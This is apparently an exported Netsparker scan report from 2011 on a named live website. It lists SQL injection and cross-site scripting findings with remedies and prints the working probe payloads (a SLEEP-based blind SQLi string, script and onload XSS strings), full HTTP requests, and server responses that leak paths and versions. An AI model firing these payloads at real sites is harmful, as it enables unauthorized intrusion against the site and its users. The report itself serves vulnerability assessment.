Netsparker, Web Application Security Scanner

SQL Injection, Local File Inclusion, XSS, DORK, www.socialfollow.com SUMMARY


Netsparker - Scan Report Summary
TARGET URL: http://www.socialfollow.com/
SCAN DATE: 4/19/2011 8:17:28 PM
REPORT DATE: 4/19/2011 9:12:54 PM
SCAN DURATION: 00:25:45
Total Requests:
Average Speed: req/sec.

31 identified / 14 confirmed / 3 critical / 7 informational

GHDB, DORK Tests
PROFILE: Previous Settings
ENABLED ENGINES: Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES
  CRITICAL      10 %
  IMPORTANT     29 %
  MEDIUM         6 %
  LOW           32 %
  INFORMATION   23 %

GHDB, DORK VULNERABILITIES

URL                                             Parameter     Method        Vulnerability                              Confirmed
/                                               -             -             Cookie Not Marked As HttpOnly              Yes
/blog/c/future-features/                        -             -             E-mail Address Disclosure                  No
/blog/wp-comments-post.php                      -             -             Internal Server Error                      Yes
/blog/wp-content/themes/social-follow-theme2/   -             -             [Possible] Internal Path Leakage (*nix)    No
/button/                                        b             GET           [Probable] SQL Injection                   No
/button/                                        -             -             Database Error Message                     No
/button/                                        -             -             [Possible] Internal Path Leakage (*nix)    No
/button/image/                                  b             GET           Blind SQL Injection                        Yes
/button/image/                                  b             GET           [Probable] SQL Injection                   No
/button/image/                                  -             -             [Possible] Local File Inclusion            No
/button/image/                                  b             GET           Programming Error Message                  No
/button/image/                                  -             -             MySQL Database Identified                  Yes
/button/image/                                  -             -             [Possible] Internal Path Leakage (*nix)    No
/forgot-password.php                            tEmail        POST          Cross-site Scripting                       Yes
/js/                                            -             -             Forbidden Resource                         Yes
/login.php                                      tEmail        POST          Cross-site Scripting                       Yes
/login.php                                      tEmail        POST          Cross-site Scripting                       Yes
/profiles/                                      Query Based   QUERYSTRING   Cross-site Scripting                       Yes
/profiles/                                      -             -             [Possible] PHP Source Code Disclosure      No
/register.php                                   tEmail        POST          Cross-site Scripting                       Yes
/register.php                                   tName         POST          Cross-site Scripting                       Yes
/register.php                                   tPassword     POST          Cross-site Scripting                       Yes
/register.php                                   -             -             [Possible] PHP Source Code Disclosure      No
/sitemap.php                                    -             -             Password Transmitted Over HTTP             Yes
/sitemap.php                                    -             -             Auto Complete Enabled                      Yes
/sitemap.xml                                    -             -             Apache Version Disclosure                  No
/sitemap.xml                                    -             -             PHP Version Disclosure                     No
/sitemap.xml                                    -             -             OpenSSL Version Disclosure                 No
/sitemap.xml                                    -             -             Apache Module Version Disclosure           No
/sitemap.xml                                    -             -             Perl Version Disclosure                    No
/sitemap.xml                                    -             -             Sitemap Identified                         No
Blind SQL Injection

1 TOTAL | CRITICAL | CONFIRMED: 1
SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL query on the back-end database. In these tests the SQL Injection was not obvious, but the page responded differently depending on the injected test, which allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most ORM systems use only parameterised queries, and this can solve the whole SQL Injection problem.
  3. Locate all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Use your web logs and application logs to check whether there was any previous but undetected attack against this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

/button/image/ CONFIRMED

http://www.socialfollow.com/button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+

Parameters
  Parameter: b
  Type: GET
  Value: -111 OR SLEEP(25)=0 LIMIT 1--

Request

GET /button/image/?b=-111%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:15 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Last-Modified: Tue, 19 Apr 2011 20:18:40 -0500
Accept-Ranges: bytes
Content-Length: 1190
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: image/gif


[Probable] SQL Injection

2 TOTAL | CRITICAL
SQL Injection occurs when data input, for example by a user, is interpreted as a SQL command rather than as normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection here, it could not confirm it. There can be numerous reasons why Netsparker was not able to confirm this. We strongly recommend investigating the issue manually to ensure that it is a SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, so that we can address it next time and give you a more precise result.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can successfully mount one or more of the following types of attack:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for the solution.
  2. If you are not using a database access layer (DAL) within the architecture, consider its benefits and implement one if appropriate. As a minimum, the use of a DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries, and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries.)
  4. Monitor and review web logs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies; however, it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

/button/image/

http://www.socialfollow.com/button/image/?b=%2527

Parameters
  Parameter: b
  Type: GET
  Value: %27

Request

GET /button/image/?b=%2527 HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<br /><b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>5</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>6</b><br /><br /><b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php:3) in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>7</b><br /><br /><b>Warning</b>: file_get_contents(../../images/button/.gif) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>8</b><br />
/button/

http://www.socialfollow.com/button/?b=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%..

Parameters
  Parameter: b
  Type: GET
  Value: (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns)

Request

GET /button/?b=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns) HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=47c832ccdac3168e15f1b611aa30d02b
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:18:10 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Keep-Alive: timeout=2, max=98
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/javascript


<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warning</b>:Cannot modify header information-headers already sent by(output started at/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php:6)in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>19</b><br/>
[the response body continues with the site's minified button JavaScript]
Cross-site Scripting

7 TOTAL | IMPORTANT | CONFIRMED: 7
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several different attack opportunities, most commonly hijacking the user's current session, or changing the look of the page by altering its HTML on the fly in order to steal the user's credentials. This happens because input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.

XSS targets the users of the application rather than the server. Although this is a limitation, it still allows attackers to hijack other users' sessions, and an attacker who targets an administrator may gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML; where the output is HTML, ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; OWASP Reform and the Microsoft Anti-Cross-site Scripting library are good examples.

/profiles/ CONFIRMED

http://www.socialfollow.com/profiles/?"><script>alert(9)</script>

Parameters
  Parameter: Query Based
  Type: QUERYSTRING
  Value: "><script>alert(9)</script>

Request

GET /profiles/?"><script>netsparker(9)</script> HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:19:16 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html


[...]</p> <p class="fullProfile"><a href="/profiles/a-little-bite-of-life/" title="A Little Bite Of Life">View Full <span class="green">Profile &gt;</span></a></p> </div> <div class="profile"> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <a href="/profiles/a-special-touch/" title="A Special Touch" class="pic"><span style="height:80px;"><img src="/images/profiles/a-special-touch-6e8c0ebb1c948ee6b5077a275549fab7.jpg" alt="A Special Touch" width="80" /></span></a> <p class="name"><a href="/profiles/a-special-touch/" title="A Special Touch" class="green">A Special Touch</a></p> <p class="desc orange"> Handmade Greeting cards for any occasion. [...]</p> <p class="fullProfile"><a href="/profiles/a-special-touch/" title="A Special Touch">View Full <span class="green"..
- /login.php

/login.php CONFIRMED

http://www.socialfollow.com/login.php

Parameters

Parameter Type Value
pPassword POST 3
submit POST submit
tEmail POST "><body onload=alert(9)>

Request

POST /login.php HTTP/1.1
Referer: http://www.socialfollow.com/login.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 72
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

pPassword=3&submit=submit&tEmail=%22%3e%3cbody+onload%3dnetsparker(9)%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:34 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4519
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Login | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div 
id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Login </h1> <p style="color: red;">The "Email Address" field must contain a valid email.<br /></p> <form method="post" name="fLogin" action=""> <table> <tr> <td width="115" valign="top"><label for="tEmail">Email Address:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><body onload=netsparker(9)>" class="textBoxSize" /></td> </tr> <tr> <td valign="top"><label for="pPassword">Password:</label></td> <td><input name="pPassword" id="pPassword" type="password" class="textBoxSize" /></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td>&nbsp;</td> <td><input name="submit" type="image" value="submit" src="/images/login-btn.gif" class="loginBtn" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fLogin");fv.addValidation("tEmail","req", "The \"Email Address\" field is required");fv.addValidation("tEmail","email", "The \"Email Address\" field must contain a valid email");fv.addValidation("pPassword","req", "The \"Password\" field is required");document.fLogin.tEmail.style.borderColor = '#FF0000';</script></div><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? 
"https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /forgot-password.php

/forgot-password.php CONFIRMED

http://www.socialfollow.com/forgot-password.php

Parameters

Parameter Type Value
tEmail POST "><iframe onload=alert(9)>

Request

POST /forgot-password.php HTTP/1.1
Referer: http://www.socialfollow.com/forgot-password.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 48
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

tEmail=%22%3e%3ciframe+onload%3dnetsparker(9)%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:39 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4495
Keep-Alive: timeout=2, max=99
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Forgot Your Password? | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: 
Header --> <div id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Forgot Your <span class="orange">Password</span></h1> <p>If you have forgotten your password and would like to reset it, enter your email below:</p> <br /> <p style="color: red;">The "Email" field must contain a valid email address.<br /></p> <form method="post" name="fForgotPassword" action=""> <table> <tr> <td valign="top"><label for="tEmail">Email:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" maxlength="100" /></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td valign="top">&nbsp;</td> <td align="right"><input type="image" src="/images/btn_reset-password.gif" alt="Reset Password" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fForgotPassword");fv.addValidation("tEmail","req", "The \"Email\" field is required");fv.addValidation("tEmail","email", "The \"Email\" field must contain a valid email address");document.fForgotPassword.tEmail.style.borderColor = '#FF0000';</script></div><!-- End: Content Section --><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /login.php

/login.php CONFIRMED

http://www.socialfollow.com/login.php

Parameters

Parameter Type Value
pPassword POST Password
tEmail POST "><iframe onload=alert(9)>

Request

POST /login.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 67
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

pPassword=Password&tEmail=%22%3e%3ciframe+onload%3dnetsparker(9)%3e

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 01:30:41 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4521
Keep-Alive: timeout=2, max=97
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Login | Social Follow</title><meta name="description" content="" /><meta name="keywords" content="" /><link type="text/css" rel="stylesheet" href="/css/master.css" /><link rel="icon" href="/favicon.ico" type="image/x-icon" /><meta name="google-site-verification" content="FTkZoYL_Hs8WSsg_pBUC6P5KKmUSwTMURtlJWzfL3F8" /><script type="text/javascript" language="javascript" src="js/validator.js"></script><link rel="stylesheet" href="/css/thickbox.css" type="text/css" media="screen" /> <script type="text/javascript" src="/js/jquery.js"></script> <script type="text/javascript" src="/js/thickbox.js"></script></head><body> <div id="header-wrapper"> <div id="header"> <div id="logo"><a href="/" title="Social Follow - All social networks in one button"><img src="/images/transparent.gif" alt="Social Follow - All social networks in one button" width="272" height="70" /></a></div> <div id="login"> <a href="/forgot-password.php" title="Forgot Password" id="aForgotPassword">Forgot your password?</a><br /> <form method="post" name="fTopLogin" action="/login.php"> <input name="tEmail" id="tEmail" type="text" value="Email" onfocus="if('Email'==this.value)this.value=''" onblur="if(''==this.value)this.value='Email'" /> <input name="pPassword" id="pPassword" type="password" value="Password" onfocus="if('Password'==this.value)this.value=''" onblur="if(''==this.value)this.value='Password'" /> <input type="submit" value="Login" class="button" /> </form> </div> <div id="nav"> <ul> <li><a href="/" title="Home" class="button selected">Home</a></li> <li><a href="/profiles/" title="Social Follow Profiles" class="button">Profiles</a></li> <li><a href="/blog/" title="Blog" class="button">Blog</a></li> </ul> </div> </div> </div> <!-- End: Header --> <div 
id="page-wrapper"> <div id="page"> <div id="green-border" class="round-top-left"><div class="left"> <h1>Login </h1> <p style="color: red;">The "Email Address" field must contain a valid email.<br /></p> <form method="post" name="fLogin" action=""> <table> <tr> <td width="115" valign="top"><label for="tEmail">Email Address:</label></td> <td><input name="tEmail" id="tEmail" type="text" value="\"><iframe onload=netsparker(9)>" class="textBoxSize" /></td> </tr> <tr> <td valign="top"><label for="pPassword">Password:</label></td> <td><input name="pPassword" id="pPassword" type="password" class="textBoxSize" /></td> </tr> <tr><td colspan="2">&nbsp;</td></tr> <tr> <td>&nbsp;</td> <td><input name="submit" type="image" value="submit" src="/images/login-btn.gif" class="loginBtn" /></td> </tr> </table> </form> <script type="text/javascript" language="javascript">var fv=new Validator("fLogin");fv.addValidation("tEmail","req", "The \"Email Address\" field is required");fv.addValidation("tEmail","email", "The \"Email Address\" field must contain a valid email");fv.addValidation("pPassword","req", "The \"Password\" field is required");document.fLogin.tEmail.style.borderColor = '#FF0000';</script></div><div class="right"> </div><br clear="all" /></div><br clear="all" /><br /><br /><br /></div></div><div id="footer"> <a href="/" title="Home">Home</a> | <a href="/profiles/" title="Profiles">Profiles</a> | <a href="/blog/" title="Blog">Blog</a> | <a href="/terms-and-conditions.php" title="Terms and Conditions">Terms</a> | <a href="/privacy-policy.php" title="Privacy Policy">Privacy</a> | <a href="/contact-us.php" title="Contact">Contact</a> | <a href="/sitemap.php" title="Sitemap">Sitemap</a> <p id="copyright">&copy; Copyright 2011 SocialFollow.com | Social Follow is owned and managed by <a href="http://www.studio98.com/" title="Studio98" target="_blank">Studio98</a></p></div><!-- End: Footer --><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? 
"https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-1794977-15");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /register.php

/register.php CONFIRMED

http://www.socialfollow.com/register.php

Parameters

Parameter Type Value
cbNewsletter POST 1
cbTerms POST agree
submit POST 3
tEmail POST "><body onload=alert(9)>
tName POST Smith
tPassword POST 3
tRePassword POST 3

Request

POST /register.php HTTP/1.1
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.socialfollow.com
Cookie: PHPSESSID=754d502c3223bfc9f476d3c400182391
Content-Length: 122
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

cbNewsletter=1&cbTerms=agree&submit=3&tEmail=%22%3e%3cbody+onload%3dnetsparker(9)%3e&tName=Smith&tPassword=3&tRePassword=3

